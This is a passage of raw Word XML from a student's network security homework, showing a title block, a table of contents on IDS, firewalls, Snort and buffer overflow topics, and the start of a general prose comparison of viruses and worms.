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174A0" w14:textId="77777777" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:right="-720" w:hanging="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CMPE 209 – Network Security and Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4563D0B4" w14:textId="28C79147" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:right="-720" w:hanging="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Homework4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214A542C" w14:textId="77777777" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:right="-720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Harish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8BDA1A" w14:textId="77777777" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:right="-720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Last Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Marepalli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3AE12C" w14:textId="77777777" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:right="-720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SJSU ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>016707314</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD4B00" w14:textId="77777777" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Professor: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A469C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dr. Yo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00A469C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nghee </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00A469C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1492F5C7" w14:textId="77777777" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:hanging="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EB7E4D" w14:textId="77777777" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:hanging="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA68971" w14:textId="327B85B1" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Differences between Virus and Worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4A53A" w14:textId="685A5680" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Difference between host-based IDS and network-based IDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB55266" w14:textId="6790EAFF" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Difference between signature-based IDS and abnormal-based IDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D942E33" w14:textId="2B99DDB7" w:rsidR="001B14D5" w:rsidRDefault="001B14D5" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00BC5903">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Explain Snort rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4F41F" w14:textId="429018F5" w:rsidR="00A710D0" w:rsidRDefault="00BC5903" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2</w:t>
      </w:r>
      <w:r w:rsidR="00A710D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Design Snort rule to prevent TCP SYN Flooding attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FC1204" w14:textId="756DC343" w:rsidR="00743E13" w:rsidRDefault="00BC5903" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00743E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Defense methods against Buffer Overflow attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE8DA0D" w14:textId="002CD60F" w:rsidR="00BC5903" w:rsidRDefault="00BC5903" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Difference between packet-filtering firewalls, stateful inspection firewalls, circuit-level firewalls, and application firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531CBF3C" w14:textId="22654378" w:rsidR="00455D42" w:rsidRDefault="00455D42" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Three-message mutual authentication protocol vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA15CE" w14:textId="18D73A7D" w:rsidR="00FF61AE" w:rsidRDefault="00FF61AE" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8. Remote User Authentication protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB7B58" w14:textId="5CCBDD99" w:rsidR="00A756DD" w:rsidRDefault="00A756DD" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9. DAC, MAC, RBAC, and ABAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14012242" w14:textId="1E224E25" w:rsidR="009162B8" w:rsidRDefault="009162B8" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10. Firewall policies in the packet-filtering firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251CAFE5" w14:textId="69110242" w:rsidR="00D22D12" w:rsidRDefault="00D22D12" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11. Buffer Overflow Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C90994F" w14:textId="26E719CE" w:rsidR="00D22D12" w:rsidRDefault="00D22D12" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12. Current Security Technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5AC1C" w14:textId="27CC3885" w:rsidR="00EA7DA3" w:rsidRDefault="00EA7DA3" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1614D27E" w14:textId="1C509EC3" w:rsidR="005D5028" w:rsidRDefault="005D5028" w:rsidP="00E01030">
      <w:pPr>
        <w:ind w:left="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EA7DA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Appendix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4582606D" w14:textId="77777777" w:rsidR="00E01030" w:rsidRDefault="00E01030">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA904D" w14:textId="2A1AA5EA" w:rsidR="00E01030" w:rsidRPr="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Differences between Virus and Worm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219B87C" w14:textId="77777777" w:rsidR="00E01030" w:rsidRPr="00E01030" w:rsidRDefault="00E01030" w:rsidP="00EB19E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Both viruses and worms are types of malicious software that can infect computers, but there are some important differences between the two.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC72BFC" w14:textId="77777777" w:rsidR="00E01030" w:rsidRPr="00E01030" w:rsidRDefault="00E01030" w:rsidP="00EB19E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16EF5291" w14:textId="77777777" w:rsidR="00E01030" w:rsidRPr="00E01030" w:rsidRDefault="00E01030" w:rsidP="00EB19E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A virus is a piece of code or software that is designed to replicate itself by inserting its code into other programs or files on a computer. Once a virus infects a file, it can spread to other files and computers when those files are shared or transferred. Viruses are usually spread through email attachments, downloaded files, or infected websites. They can be very destructive and can cause a wide range of problems, from slowing down a computer to deleting important files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F4D6E" w14:textId="77777777" w:rsidR="00E01030" w:rsidRPr="00E01030" w:rsidRDefault="00E01030" w:rsidP="00EB19E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5BBFBF" w14:textId="46C4F764" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00EB19E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A worm, on the other hand, is a self-replicating program that spreads over a network without needing to attach itself to a file or program. Worms typically spread through security vulnerabilities in operating systems or other software. They can be used to create botnets or to steal sensitive information, such as passwords or credit card numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D538735" w14:textId="5876A17E" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1E432D" w14:textId="6251DF26" w:rsidR="00E01030" w:rsidRDefault="00E01030" w:rsidP="00E01030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Answer in table form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFC013" w14:textId="77777777" w:rsidR="00CA27E4" w:rsidRPr="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9985" w:type="dxa"/>
        <w:tblInd w:w="-360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
